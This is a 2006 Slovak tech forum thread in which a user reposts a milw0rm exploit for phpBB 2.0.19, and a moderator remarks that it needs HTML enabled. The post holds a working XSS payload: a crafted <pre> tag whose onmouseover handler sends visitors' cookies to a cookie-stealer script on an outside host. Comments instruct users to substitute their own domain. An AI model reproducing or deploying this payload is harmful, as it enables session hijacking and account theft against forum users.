[ Príspevkov: 2 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 08.12.05
Prihlásený: 12.02.06
Príspevky: 1
Témy: 1 | 1
NapísalOffline : 12.02.2006 21:19 | exploit na phpbb 2.0.19

Kód:
# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cookie' b='<pre' >

[url]http://www.somesite.com/[/url]</pre>

# milw0rm.com [2006-01-29]


Offline

Prevádzkovateľ fóra
Prevádzkovateľ fóra
exploit na phpbb 2.0.19

Registrovaný: 01.05.05
Príspevky: 13557
Témy: 1483 | 1483
Bydlisko: Bratislava
NapísalOffline : 12.02.2006 21:32 | exploit na phpbb 2.0.19

zajujimave ale mam pocit ze toto je mozne uplatnit len na forach s povolenym html zobrazovanim, ak sa nemylim


_________________
Streacom DA2 | SilverStone Titanium SX800-LTI 800W | ASRock X299E-ITX/ac | Intel Core i9-9980XE & be quiet! Dark Rock TF | Kingston HyperX Impact 64 GB DDR4 2666 MHz | NVIDIA Titan RTX 24 GB | Intel SSD Optane 905P 480 GB NVMe U.2 & Intel SSD 750 1,2 TB NVMe U.2 & Intel SSD 660p 2 TB NVMe M.2 & Seagate BackUp Plus Portable 56 TB USB | 55" 4K OLED Dell Alienware AW5520QF | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech G603 | Logitech F710 | Harman Kardon Sabre SB 35 & Sennheiser RS 175 | Microsoft Windows 11 Enterprise | APC Back-UPS BE-850 VA | Lenovo ThinkPad X1 Carbon | SilverStone ML05B Milo | Corsair SF600 SFX 600W | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 & NOCTUA NH-L12S | Kingston HyperX Savage 32 GB DDR4 2400 MHz | NVIDIA GeForce GT 710 1 GB | Intel SSD Optane Memory 32 GB NVMe M.2 & Intel SSD 730 240 GB SATA & Samsung SSD 860 1 TB | Ubuntu 24.04 LTS | Dell Wyse 3040 | Intel Atom x5-Z8350 | 2 GB DDR3 1600 MHz | 16 GB eMMC | 24" EIZO FlexScan EV2451 | Alpine Linux + XFCE4
 [ Príspevkov: 2 ] 


exploit na phpbb 2.0.19



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

Prechod z 2.0.19 --> 2.0.21

v CMS

19

2571

27.06.2006 7:56

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

Update z PHPBB 2.0.20 na PHPBB PLUS 1.53

v CMS

5

1229

31.08.2006 23:16

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.20

v CMS

15

4917

17.05.2006 20:25

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.20

v CMS

18

2519

29.05.2006 9:39

gumy

V tomto fóre nie sú ďalšie neprečítané témy.

Upgrade phpBB 2.0.21

v CMS

1

721

15.07.2007 20:25

Flety

V tomto fóre nie sú ďalšie neprečítané témy.

phpbb 2.0.22 - pocet poziadaviek

v CMS

8

1888

17.10.2009 0:53

chrono

V tomto fóre nie sú ďalšie neprečítané témy.

Critical Java 0-day exploit

v Novinky

6

636

03.09.2012 12:56

Xarxes

V tomto fóre nie sú ďalšie neprečítané témy.

Radenie príspevkov v phpBB 2.0.22

v CMS

5

1367

06.02.2008 14:54

polip4

V tomto fóre nie sú ďalšie neprečítané témy.

zlúčenie tém v phpBB 2.0.22

v CMS

6

1121

22.09.2009 19:52

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Hladam: Color groups pre phpBB 2.0.20

v CMS

3

808

04.02.2007 10:01

joker

V tomto fóre nie sú ďalšie neprečítané témy.

PREKLAD: ezPortal for phpBB 2.0.x CZ

v CMS

0

3147

12.11.2006 17:02

JanoF

V tomto fóre nie sú ďalšie neprečítané témy.

Chyba v slovenskom preklade phpbb 2.0.x

v CMS

1

792

27.04.2007 17:55

Tom@S

V tomto fóre nie sú ďalšie neprečítané témy.

Help me - slovensky preklad na phpbb 2.0.21

v CMS

2

921

04.01.2007 10:28

inekafe

V tomto fóre nie sú ďalšie neprečítané témy.

Skype 2.0.0.107 & 2.5.0.91 BETA

v Novinky

14

4247

06.09.2006 19:56

vandal666

V tomto fóre nie sú ďalšie neprečítané témy.

nezobrazuje mi fora v phpbb 3.0.0

v CMS

4

1365

24.01.2008 19:44

Kirk

V tomto fóre nie sú ďalšie neprečítané témy.

PHPBB 3.0.b4

v CMS

7

968

20.12.2006 23:32

JanoF



© 2005 - 2026 PCforum, edited by JanoF